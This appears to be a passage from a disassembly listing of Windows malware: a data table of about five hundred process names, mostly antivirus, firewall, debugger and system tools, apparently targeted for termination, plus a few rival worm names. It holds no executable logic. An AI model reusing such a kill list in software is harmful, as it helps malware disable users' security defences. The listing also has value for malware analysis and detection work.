dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset dword_438C9C
dd offset dword_438C90
dd offset dword_438C84
dd offset dword_438C78
dd offset dword_438C68
dd offset dword_438C5C
dd offset dword_438C50
dd offset dword_438C44
dd offset dword_438C38
dd offset dword_438C28
dd offset dword_438C1C
dd offset dword_438C0C
dword_438C0C dd 72313169h, 346E3435h, 6578652Eh, 0 ; ___:00438C08�o
